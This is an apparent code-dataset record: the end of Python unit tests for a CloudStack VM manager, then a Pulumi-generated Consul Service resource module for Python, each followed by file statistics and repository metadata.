self.assertEqual("uuid_val", unit.secret)
self.assertEqual(instance, unit.instance)
self.assertEqual("172.16.42.1", unit.dns_name)
self.assertEqual("creating", unit.state)
strg_mock.retrieve_instance.assert_called_with(name="some_instance")
create_data = {"group": "feaas", "templateid": self.template_id,
"zoneid": self.zone_id,
"serviceofferingid": self.service_offering_id,
"userdata": user_data, "networkids": self.network_ids,
"projectid": self.project_id}
client_mock.deployVirtualMachine.assert_called_with(create_data)
actual_user_data = manager.get_user_data("uuid_val")
client_mock.encode_user_data.assert_called_with(actual_user_data)
def test_start_instance_timeout(self):
def cleanup():
del os.environ["CLOUDSTACK_MAX_TRIES"]
self.addCleanup(cleanup)
os.environ["CLOUDSTACK_MAX_TRIES"] = "1"
self.set_api_envs()
self.addCleanup(self.del_api_envs)
self.set_vm_envs()
self.addCleanup(self.del_vm_envs)
instance = storage.Instance(name="some_instance", units=[])
strg_mock = mock.Mock()
strg_mock.retrieve_instance.return_value = instance
client_mock = mock.Mock()
client_mock.deployVirtualMachine.return_value = {"id": "abc123",
"jobid": "qwe321"}
client_mock.queryAsyncJobResult.return_value = {"jobstatus": 0}
manager = cloudstack.CloudStackManager(storage=strg_mock)
manager.client = client_mock
with self.assertRaises(cloudstack.MaxTryExceededError) as cm:
manager.start_instance("some_instance")
exc = cm.exception
self.assertEqual(1, exc.max_tries)
def test_terminate_instance(self):
self.set_api_envs()
self.addCleanup(self.del_api_envs)
instance = storage.Instance(name="some_instance",
units=[storage.Unit(id="vm-123"),
storage.Unit(id="vm-456")])
strg_mock = mock.Mock()
strg_mock.retrieve_instance.return_value = instance
manager = cloudstack.CloudStackManager(storage=strg_mock)
manager.client = client_mock = mock.Mock()
got_instance = manager.terminate_instance("some_instance")
self.assertEqual(instance, got_instance)
expected_calls = [mock.call({"id": "vm-123"}), mock.call({"id": "vm-456"})]
self.assertEqual(expected_calls, client_mock.destroyVirtualMachine.call_args_list)
@mock.patch("sys.stderr")
def test_terminate_instance_ignores_exceptions(self, stderr):
self.set_api_envs()
self.addCleanup(self.del_api_envs)
instance = storage.Instance(name="some_instance",
units=[storage.Unit(id="vm-123"),
storage.Unit(id="vm-456")])
strg_mock = mock.Mock()
strg_mock.retrieve_instance.return_value = instance
client_mock = mock.Mock()
client_mock.destroyVirtualMachine.side_effect = Exception("wat", "wot")
manager = cloudstack.CloudStackManager(storage=strg_mock)
manager.client = client_mock
got_instance = manager.terminate_instance("some_instance")
self.assertEqual(instance, got_instance)
stderr.write.assert_called_with("[ERROR] Failed to terminate CloudStack VM: wat wot")
@mock.patch("uuid.uuid4")
def test_physical_scale_up(self, uuid):
self.set_api_envs()
self.addCleanup(self.del_api_envs)
self.set_vm_envs(project_id="project-123", network_ids="net-123")
self.addCleanup(self.del_vm_envs)
uuid.return_value = "uuid_val"
instance = storage.Instance(name="some_instance",
units=[storage.Unit(id="123")])
strg_mock = mock.Mock()
client_mock = mock.Mock()
client_mock.deployVirtualMachine.return_value = {"id": "abc123",
"jobid": "qwe321"}
client_mock.queryAsyncJobResult.return_value = {"jobstatus": 1}
vm = {"id": "qwe123", "nic": [{"ipaddress": "10.0.0.5"}]}
client_mock.listVirtualMachines.return_value = {"virtualmachine": [vm]}
client_mock.encode_user_data.return_value = user_data = mock.Mock()
manager = cloudstack.CloudStackManager(storage=strg_mock)
manager.client = client_mock
units = manager.physical_scale(instance, 2)
self.assertEqual(2, len(instance.units))
self.assertEqual(1, len(units))
unit = instance.units[1]
self.assertEqual("qwe123", unit.id)
self.assertEqual("uuid_val", unit.secret)
self.assertEqual(instance, unit.instance)
self.assertEqual("10.0.0.5", unit.dns_name)
self.assertEqual("creating", unit.state)
create_data = {"group": "feaas", "templateid": self.template_id,
"zoneid": self.zone_id,
"serviceofferingid": self.service_offering_id,
"userdata": user_data, "networkids": self.network_ids,
"projectid": self.project_id}
client_mock.deployVirtualMachine.assert_called_with(create_data)
actual_user_data = manager.get_user_data("uuid_val")
client_mock.encode_user_data.assert_called_with(actual_user_data)
def test_physical_scale_down(self):
self.set_api_envs()
self.addCleanup(self.del_api_envs)
units = [storage.Unit(id="vm-123"), storage.Unit(id="vm-456"),
storage.Unit(id="vm-789")]
instance = storage.Instance(name="some_instance", units=copy.deepcopy(units))
strg_mock = mock.Mock()
manager = cloudstack.CloudStackManager(storage=strg_mock)
manager.client = client_mock = mock.Mock()
got_units = manager.physical_scale(instance, 1)
self.assertEqual(1, len(instance.units))
self.assertEqual(2, len(got_units))
self.assertEqual("vm-789", instance.units[0].id)
expected_calls = [mock.call({"id": "vm-123"}), mock.call({"id": "vm-456"})]
self.assertEqual(expected_calls, client_mock.destroyVirtualMachine.call_args_list)
class MaxTryExceededErrorTestCase(unittest.TestCase):
def test_error_message(self):
exc = cloudstack.MaxTryExceededError(40)
self.assertEqual(40, exc.max_tries)
self.assertEqual(("exceeded 40 tries",), exc.args)
| 50.873096
| 93
| 0.641289
| 2,278
| 20,044
| 5.367867
| 0.080773
| 0.04825
| 0.017991
| 0.034347
| 0.849444
| 0.81526
| 0.783039
| 0.779441
| 0.760877
| 0.756706
| 0
| 0.018821
| 0.244512
| 20,044
| 393
| 94
| 51.002545
| 0.788681
| 0.007633
| 0
| 0.738292
| 0
| 0
| 0.130688
| 0.015739
| 0
| 0
| 0
| 0
| 0.220386
| 1
| 0.060606
| false
| 0
| 0.016529
| 0
| 0.082645
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
698ec548e5329be27b0c0a6845653091ba28e24a
| 32,783
|
py
|
Python
|
sdk/python/pulumi_consul/service.py
|
pulumi/pulumi-consul
|
5b66c5b97fda6b5433bfb4d4173c999e468c82e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2019-11-12T12:21:18.000Z
|
2021-07-31T08:17:22.000Z
|
sdk/python/pulumi_consul/service.py
|
pulumi/pulumi-consul
|
5b66c5b97fda6b5433bfb4d4173c999e468c82e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 38
|
2019-11-21T15:19:33.000Z
|
2022-03-31T15:24:11.000Z
|
sdk/python/pulumi_consul/service.py
|
pulumi/pulumi-consul
|
5b66c5b97fda6b5433bfb4d4173c999e468c82e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2020-11-24T12:23:13.000Z
|
2021-12-06T17:33:31.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ServiceArgs', 'Service']
@pulumi.input_type
class ServiceArgs:
def __init__(__self__, *,
node: pulumi.Input[str],
address: Optional[pulumi.Input[str]] = None,
checks: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceCheckArgs']]]] = None,
datacenter: Optional[pulumi.Input[str]] = None,
enable_tag_override: Optional[pulumi.Input[bool]] = None,
external: Optional[pulumi.Input[bool]] = None,
meta: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
namespace: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
service_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a Service resource.
:param pulumi.Input[str] node: The name of the node the to register the service on.
:param pulumi.Input[str] address: The address of the service. Defaults to the
address of the node.
:param pulumi.Input[str] datacenter: The datacenter to use. This overrides the
agent's default datacenter and the datacenter in the provider setup.
:param pulumi.Input[bool] enable_tag_override: Specifies to disable the
anti-entropy feature for this service's tags. Defaults to `false`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] meta: A map of arbitrary KV metadata linked to the service
instance.
:param pulumi.Input[str] name: The name of the health-check.
:param pulumi.Input[str] namespace: The namespace to create the service within.
:param pulumi.Input[int] port: The port of the service.
:param pulumi.Input[str] service_id: - If the service ID is not provided, it will be defaulted to the value
of the `name` attribute.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of values that are opaque to Consul,
but can be used to distinguish between services or nodes.
"""
pulumi.set(__self__, "node", node)
if address is not None:
pulumi.set(__self__, "address", address)
if checks is not None:
pulumi.set(__self__, "checks", checks)
if datacenter is not None:
pulumi.set(__self__, "datacenter", datacenter)
if enable_tag_override is not None:
pulumi.set(__self__, "enable_tag_override", enable_tag_override)
if external is not None:
warnings.warn("""The external field has been deprecated and does nothing.""", DeprecationWarning)
pulumi.log.warn("""external is deprecated: The external field has been deprecated and does nothing.""")
if external is not None:
pulumi.set(__self__, "external", external)
if meta is not None:
pulumi.set(__self__, "meta", meta)
if name is not None:
pulumi.set(__self__, "name", name)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if port is not None:
pulumi.set(__self__, "port", port)
if service_id is not None:
pulumi.set(__self__, "service_id", service_id)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def node(self) -> pulumi.Input[str]:
"""
The name of the node the to register the service on.
"""
return pulumi.get(self, "node")
@node.setter
def node(self, value: pulumi.Input[str]):
pulumi.set(self, "node", value)
@property
@pulumi.getter
def address(self) -> Optional[pulumi.Input[str]]:
"""
The address of the service. Defaults to the
address of the node.
"""
return pulumi.get(self, "address")
@address.setter
def address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "address", value)
@property
@pulumi.getter
def checks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServiceCheckArgs']]]]:
return pulumi.get(self, "checks")
@checks.setter
def checks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceCheckArgs']]]]):
pulumi.set(self, "checks", value)
@property
@pulumi.getter
def datacenter(self) -> Optional[pulumi.Input[str]]:
"""
The datacenter to use. This overrides the
agent's default datacenter and the datacenter in the provider setup.
"""
return pulumi.get(self, "datacenter")
@datacenter.setter
def datacenter(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "datacenter", value)
@property
@pulumi.getter(name="enableTagOverride")
def enable_tag_override(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies to disable the
anti-entropy feature for this service's tags. Defaults to `false`.
"""
return pulumi.get(self, "enable_tag_override")
@enable_tag_override.setter
def enable_tag_override(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_tag_override", value)
@property
@pulumi.getter
def external(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "external")
@external.setter
def external(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "external", value)
@property
@pulumi.getter
def meta(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of arbitrary KV metadata linked to the service
instance.
"""
return pulumi.get(self, "meta")
@meta.setter
def meta(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "meta", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the health-check.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def namespace(self) -> Optional[pulumi.Input[str]]:
"""
The namespace to create the service within.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
The port of the service.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="serviceId")
def service_id(self) -> Optional[pulumi.Input[str]]:
"""
- If the service ID is not provided, it will be defaulted to the value
of the `name` attribute.
"""
return pulumi.get(self, "service_id")
@service_id.setter
def service_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_id", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of values that are opaque to Consul,
but can be used to distinguish between services or nodes.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _ServiceState:
def __init__(__self__, *,
address: Optional[pulumi.Input[str]] = None,
checks: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceCheckArgs']]]] = None,
datacenter: Optional[pulumi.Input[str]] = None,
enable_tag_override: Optional[pulumi.Input[bool]] = None,
external: Optional[pulumi.Input[bool]] = None,
meta: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
namespace: Optional[pulumi.Input[str]] = None,
node: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
service_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering Service resources.
:param pulumi.Input[str] address: The address of the service. Defaults to the
address of the node.
:param pulumi.Input[str] datacenter: The datacenter to use. This overrides the
agent's default datacenter and the datacenter in the provider setup.
:param pulumi.Input[bool] enable_tag_override: Specifies to disable the
anti-entropy feature for this service's tags. Defaults to `false`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] meta: A map of arbitrary KV metadata linked to the service
instance.
:param pulumi.Input[str] name: The name of the health-check.
:param pulumi.Input[str] namespace: The namespace to create the service within.
:param pulumi.Input[str] node: The name of the node the to register the service on.
:param pulumi.Input[int] port: The port of the service.
:param pulumi.Input[str] service_id: - If the service ID is not provided, it will be defaulted to the value
of the `name` attribute.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of values that are opaque to Consul,
but can be used to distinguish between services or nodes.
"""
if address is not None:
pulumi.set(__self__, "address", address)
if checks is not None:
pulumi.set(__self__, "checks", checks)
if datacenter is not None:
pulumi.set(__self__, "datacenter", datacenter)
if enable_tag_override is not None:
pulumi.set(__self__, "enable_tag_override", enable_tag_override)
if external is not None:
warnings.warn("""The external field has been deprecated and does nothing.""", DeprecationWarning)
pulumi.log.warn("""external is deprecated: The external field has been deprecated and does nothing.""")
if external is not None:
pulumi.set(__self__, "external", external)
if meta is not None:
pulumi.set(__self__, "meta", meta)
if name is not None:
pulumi.set(__self__, "name", name)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if node is not None:
pulumi.set(__self__, "node", node)
if port is not None:
pulumi.set(__self__, "port", port)
if service_id is not None:
pulumi.set(__self__, "service_id", service_id)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def address(self) -> Optional[pulumi.Input[str]]:
"""
The address of the service. Defaults to the
address of the node.
"""
return pulumi.get(self, "address")
@address.setter
def address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "address", value)
@property
@pulumi.getter
def checks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServiceCheckArgs']]]]:
return pulumi.get(self, "checks")
@checks.setter
def checks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceCheckArgs']]]]):
pulumi.set(self, "checks", value)
@property
@pulumi.getter
def datacenter(self) -> Optional[pulumi.Input[str]]:
"""
The datacenter to use. This overrides the
agent's default datacenter and the datacenter in the provider setup.
"""
return pulumi.get(self, "datacenter")
@datacenter.setter
def datacenter(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "datacenter", value)
@property
@pulumi.getter(name="enableTagOverride")
def enable_tag_override(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies to disable the
anti-entropy feature for this service's tags. Defaults to `false`.
"""
return pulumi.get(self, "enable_tag_override")
@enable_tag_override.setter
def enable_tag_override(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_tag_override", value)
@property
@pulumi.getter
def external(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "external")
@external.setter
def external(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "external", value)
@property
@pulumi.getter
def meta(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of arbitrary KV metadata linked to the service
instance.
"""
return pulumi.get(self, "meta")
@meta.setter
def meta(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "meta", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the health-check.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def namespace(self) -> Optional[pulumi.Input[str]]:
"""
The namespace to create the service within.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter
def node(self) -> Optional[pulumi.Input[str]]:
"""
The name of the node the to register the service on.
"""
return pulumi.get(self, "node")
@node.setter
def node(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "node", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
The port of the service.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="serviceId")
def service_id(self) -> Optional[pulumi.Input[str]]:
"""
- If the service ID is not provided, it will be defaulted to the value
of the `name` attribute.
"""
return pulumi.get(self, "service_id")
@service_id.setter
def service_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_id", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of values that are opaque to Consul,
but can be used to distinguish between services or nodes.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class Service(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
address: Optional[pulumi.Input[str]] = None,
checks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceCheckArgs']]]]] = None,
datacenter: Optional[pulumi.Input[str]] = None,
enable_tag_override: Optional[pulumi.Input[bool]] = None,
external: Optional[pulumi.Input[bool]] = None,
meta: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
namespace: Optional[pulumi.Input[str]] = None,
node: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
service_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
"""
A high-level resource for creating a Service in Consul in the Consul catalog. This
is appropriate for registering [external services](https://www.consul.io/docs/guides/external.html) and
can be used to create services addressable by Consul that cannot be registered
with a [local agent](https://www.consul.io/docs/agent/basics.html).
> **NOTE:** If a Consul agent is running on the node where this service is
registered, it is not recommended to use this resource as the service will be
removed during the next [anti-entropy synchronization](https://www.consul.io/docs/architecture/anti-entropy).
## Example Usage
Creating a new node with the service:
```python
import pulumi
import pulumi_consul as consul
compute = consul.Node("compute", address="www.google.com")
google = consul.Service("google",
node=compute.name,
port=80,
tags=["tag0"])
```
Utilizing an existing known node:
```python
import pulumi
import pulumi_consul as consul
google = consul.Service("google",
node="google",
port=443)
```
Register a health-check:
```python
import pulumi
import pulumi_consul as consul
redis = consul.Service("redis",
checks=[consul.ServiceCheckArgs(
check_id="service:redis1",
deregister_critical_service_after="30s",
headers=[
consul.ServiceCheckHeaderArgs(
name="foo",
value=["test"],
),
consul.ServiceCheckHeaderArgs(
name="bar",
value=["test"],
),
],
http="https://www.hashicorptest.com",
interval="5s",
method="PUT",
name="Redis health check",
status="passing",
timeout="1s",
tls_skip_verify=False,
)],
node="redis",
port=6379)
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] address: The address of the service. Defaults to the
address of the node.
:param pulumi.Input[str] datacenter: The datacenter to use. This overrides the
agent's default datacenter and the datacenter in the provider setup.
:param pulumi.Input[bool] enable_tag_override: Specifies to disable the
anti-entropy feature for this service's tags. Defaults to `false`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] meta: A map of arbitrary KV metadata linked to the service
instance.
:param pulumi.Input[str] name: The name of the health-check.
:param pulumi.Input[str] namespace: The namespace to create the service within.
:param pulumi.Input[str] node: The name of the node the to register the service on.
:param pulumi.Input[int] port: The port of the service.
:param pulumi.Input[str] service_id: - If the service ID is not provided, it will be defaulted to the value
of the `name` attribute.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of values that are opaque to Consul,
but can be used to distinguish between services or nodes.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ServiceArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A high-level resource for creating a Service in Consul in the Consul catalog. This
is appropriate for registering [external services](https://www.consul.io/docs/guides/external.html) and
can be used to create services addressable by Consul that cannot be registered
with a [local agent](https://www.consul.io/docs/agent/basics.html).
> **NOTE:** If a Consul agent is running on the node where this service is
registered, it is not recommended to use this resource as the service will be
removed during the next [anti-entropy synchronization](https://www.consul.io/docs/architecture/anti-entropy).
## Example Usage
Creating a new node with the service:
```python
import pulumi
import pulumi_consul as consul
compute = consul.Node("compute", address="www.google.com")
google = consul.Service("google",
node=compute.name,
port=80,
tags=["tag0"])
```
Utilizing an existing known node:
```python
import pulumi
import pulumi_consul as consul
google = consul.Service("google",
node="google",
port=443)
```
Register a health-check:
```python
import pulumi
import pulumi_consul as consul
redis = consul.Service("redis",
checks=[consul.ServiceCheckArgs(
check_id="service:redis1",
deregister_critical_service_after="30s",
headers=[
consul.ServiceCheckHeaderArgs(
name="foo",
value=["test"],
),
consul.ServiceCheckHeaderArgs(
name="bar",
value=["test"],
),
],
http="https://www.hashicorptest.com",
interval="5s",
method="PUT",
name="Redis health check",
status="passing",
timeout="1s",
tls_skip_verify=False,
)],
node="redis",
port=6379)
```
:param str resource_name: The name of the resource.
:param ServiceArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ServiceArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
address: Optional[pulumi.Input[str]] = None,
checks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceCheckArgs']]]]] = None,
datacenter: Optional[pulumi.Input[str]] = None,
enable_tag_override: Optional[pulumi.Input[bool]] = None,
external: Optional[pulumi.Input[bool]] = None,
meta: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
namespace: Optional[pulumi.Input[str]] = None,
node: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
service_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ServiceArgs.__new__(ServiceArgs)
__props__.__dict__["address"] = address
__props__.__dict__["checks"] = checks
__props__.__dict__["datacenter"] = datacenter
__props__.__dict__["enable_tag_override"] = enable_tag_override
if external is not None and not opts.urn:
warnings.warn("""The external field has been deprecated and does nothing.""", DeprecationWarning)
pulumi.log.warn("""external is deprecated: The external field has been deprecated and does nothing.""")
__props__.__dict__["external"] = external
__props__.__dict__["meta"] = meta
__props__.__dict__["name"] = name
__props__.__dict__["namespace"] = namespace
if node is None and not opts.urn:
raise TypeError("Missing required property 'node'")
__props__.__dict__["node"] = node
__props__.__dict__["port"] = port
__props__.__dict__["service_id"] = service_id
__props__.__dict__["tags"] = tags
super(Service, __self__).__init__(
'consul:index/service:Service',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
address: Optional[pulumi.Input[str]] = None,
checks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceCheckArgs']]]]] = None,
datacenter: Optional[pulumi.Input[str]] = None,
enable_tag_override: Optional[pulumi.Input[bool]] = None,
external: Optional[pulumi.Input[bool]] = None,
meta: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
namespace: Optional[pulumi.Input[str]] = None,
node: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
service_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'Service':
"""
Get an existing Service resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] address: The address of the service. Defaults to the
address of the node.
:param pulumi.Input[str] datacenter: The datacenter to use. This overrides the
agent's default datacenter and the datacenter in the provider setup.
:param pulumi.Input[bool] enable_tag_override: Specifies to disable the
anti-entropy feature for this service's tags. Defaults to `false`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] meta: A map of arbitrary KV metadata linked to the service
instance.
:param pulumi.Input[str] name: The name of the health-check.
:param pulumi.Input[str] namespace: The namespace to create the service within.
:param pulumi.Input[str] node: The name of the node the to register the service on.
:param pulumi.Input[int] port: The port of the service.
:param pulumi.Input[str] service_id: - If the service ID is not provided, it will be defaulted to the value
of the `name` attribute.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of values that are opaque to Consul,
but can be used to distinguish between services or nodes.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ServiceState.__new__(_ServiceState)
__props__.__dict__["address"] = address
__props__.__dict__["checks"] = checks
__props__.__dict__["datacenter"] = datacenter
__props__.__dict__["enable_tag_override"] = enable_tag_override
__props__.__dict__["external"] = external
__props__.__dict__["meta"] = meta
__props__.__dict__["name"] = name
__props__.__dict__["namespace"] = namespace
__props__.__dict__["node"] = node
__props__.__dict__["port"] = port
__props__.__dict__["service_id"] = service_id
__props__.__dict__["tags"] = tags
return Service(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def address(self) -> pulumi.Output[str]:
"""
The address of the service. Defaults to the
address of the node.
"""
return pulumi.get(self, "address")
@property
@pulumi.getter
def checks(self) -> pulumi.Output[Optional[Sequence['outputs.ServiceCheck']]]:
return pulumi.get(self, "checks")
@property
@pulumi.getter
def datacenter(self) -> pulumi.Output[str]:
"""
The datacenter to use. This overrides the
agent's default datacenter and the datacenter in the provider setup.
"""
return pulumi.get(self, "datacenter")
@property
@pulumi.getter(name="enableTagOverride")
def enable_tag_override(self) -> pulumi.Output[Optional[bool]]:
"""
Specifies to disable the
anti-entropy feature for this service's tags. Defaults to `false`.
"""
return pulumi.get(self, "enable_tag_override")
@property
@pulumi.getter
def external(self) -> pulumi.Output[Optional[bool]]:
return pulumi.get(self, "external")
@property
@pulumi.getter
def meta(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A map of arbitrary KV metadata linked to the service
instance.
"""
return pulumi.get(self, "meta")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the health-check.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def namespace(self) -> pulumi.Output[Optional[str]]:
"""
The namespace to create the service within.
"""
return pulumi.get(self, "namespace")
@property
@pulumi.getter
def node(self) -> pulumi.Output[str]:
"""
The name of the node the to register the service on.
"""
return pulumi.get(self, "node")
@property
@pulumi.getter
def port(self) -> pulumi.Output[Optional[int]]:
"""
The port of the service.
"""
return pulumi.get(self, "port")
@property
@pulumi.getter(name="serviceId")
def service_id(self) -> pulumi.Output[str]:
"""
- If the service ID is not provided, it will be defaulted to the value
of the `name` attribute.
"""
return pulumi.get(self, "service_id")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of values that are opaque to Consul,
but can be used to distinguish between services or nodes.
"""
return pulumi.get(self, "tags")
| 39.833536
| 134
| 0.607144
| 3,826
| 32,783
| 5.059854
| 0.066649
| 0.106255
| 0.076657
| 0.057958
| 0.913529
| 0.896276
| 0.876595
| 0.870706
| 0.866419
| 0.862854
| 0
| 0.001322
| 0.284934
| 32,783
| 822
| 135
| 39.881995
| 0.824503
| 0.33676
| 0
| 0.848921
| 1
| 0
| 0.08753
| 0.001448
| 0
| 0
| 0
| 0
| 0
| 1
| 0.160671
| false
| 0.002398
| 0.016787
| 0.014388
| 0.273381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
